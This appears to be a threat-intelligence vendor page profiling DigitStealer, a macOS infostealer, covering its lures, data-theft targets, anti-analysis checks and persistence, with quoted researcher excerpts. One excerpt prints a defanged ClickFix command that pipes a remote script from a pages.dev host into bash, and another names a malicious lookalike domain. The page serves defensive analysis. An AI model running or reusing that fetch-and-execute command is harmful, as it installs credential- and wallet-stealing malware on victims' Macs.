DigitStealer is a macOS-focused infostealer that emerged in late 2025 and is associated with socially engineered campaigns targeting Mac users. It is notable for a comparatively sophisticated, platform-aware infection chain that emphasizes stealth, fileless execution, and selective targeting of newer Apple Silicon systems, particularly M2-and-later devices, while avoiding execution on Intel Macs, M1 systems, virtual machines, and certain locales. Distribution has been observed through fake software lures, including impersonation of the DynamicLake utility, malicious disk images, and ClickFix-style prompts that trick victims into executing commands in Terminal.
Once launched, DigitStealer uses a multi-stage workflow combining shell scripts, AppleScript, and JXA to harvest sensitive data. Reported theft objectives include macOS credentials, browser passwords and browsing data, Keychain contents, session data, cryptocurrency wallet data, VPN configurations, Telegram data, developer-related secrets, and user files such as documents and notes. Some reporting also describes tampering with Ledger Live as part of wallet-focused theft activity. The malware has been observed resetting macOS privacy permissions and using staged payload separation to reduce detection opportunities. Persistence has been reported via LaunchAgent-based mechanisms, and at least one analyzed variant used DNS TXT record retrieval for follow-on payload delivery and command handling.
DigitStealer has been tracked in broader macOS infostealer activity alongside families such as AMOS and MacSync, reflecting the expansion of credential- and wallet-theft operations from Windows into Apple environments. Campaign reporting indicates targeting of Mac users through fake utility and software-installation themes, with particular relevance to users holding cryptocurrency assets or valuable credentials. Its combination of anti-analysis checks, native macOS automation, selective execution gates, and broad data-theft coverage makes it a representative example of the increasing maturity of macOS infostealer operations.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
29 distinct techniques documented for this family, organized by ATT&CK tactic.
The ad in question was posing as DynamicLake, a legitimate Mac utility... the original link seen above redirects to dynamicmacisland[.]com, a malicious lookalike domain with no ties to the actual app.
Mac users are encountering deceptive websites—often through Google Ads or malicious advertisements... During November 2025, Microsoft Defender Experts identified a WhatsApp platform abuse campaign... sends malicious attachments to all contacts using predefined messaging templates.
The final stage establishes persistence through a Launch Agent that dynamically retrieves its payload from a DNS TXT record.
Adversaries began using those same paste-and-run methods on macOS, replacing PowerShell with a combination of shell script and AppleScript code.
Once the fateful paste into a Terminal window took place, the traditional AppleScript stealer code we’ve observed in previous years executed to gather data and exfiltrate.
curl -fsSL https[:]//67e5143a9ca7d2240c137ef80f2641d6.pages[.]dev/c9c114433040497328fe9212012b1b94.aspx| bash
The ad in question was posing as DynamicLake... redirects to dynamicmacisland[.]com, a malicious lookalike domain with no ties to the actual app.
Once decoded, the dropper reveals unusually extensive anti-analysis features, including locale restrictions, VM detection, and hardware-specific sysctl checks.
The first major payload is surprisingly straightforward: an AppleScript that prompts the victim for their macOS password and immediately begins credential harvesting.
Leverage Defender’s custom detection rules to alert on abnormal access to Keychain, browser credential stores, and cloud/developer artifacts, including SSH keys, Kubernetes configs, AWS credentials, and wallet data.
These campaigns leverage... to harvest credentials, session data, secrets from browsers, keychains, and developer environments.
All three harvest the same types of data—browser credentials, saved passwords... CrystalPDF.exe... covertly hijacking Firefox and Chrome browsers to access sensitive files... including cookies, session data, and credential caches.
Once decoded, the dropper reveals unusually extensive anti-analysis features, including locale restrictions, VM detection, and hardware-specific sysctl checks.
The first major payload is surprisingly straightforward: an AppleScript that prompts the victim for their macOS password and immediately begins credential harvesting.
The downloaded JXA script acts as a long-running backdoor, polling the C2 server every 10 seconds for new AppleScript or JavaScript commands.
11 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
15 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A macOS stealer family also referenced through its stager component in campaign telemetry.
Another stealer malware observed in cases associated with the same malicious ad / ClickFix-style campaign targeting Mac users.
An active macOS infostealer mentioned as part of the expansion of credential-theft malware beyond Windows into macOS environments.
Referenced as a similar-but-distinct macOS stealer family; the content argues the analyzed malware is not DigitStealer, citing differences (e.g., no geofencing for Russia/CIS, no Ledger wallet modification, no Python modules, no DNS beaconing, no Deobf-io obfuscation).
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.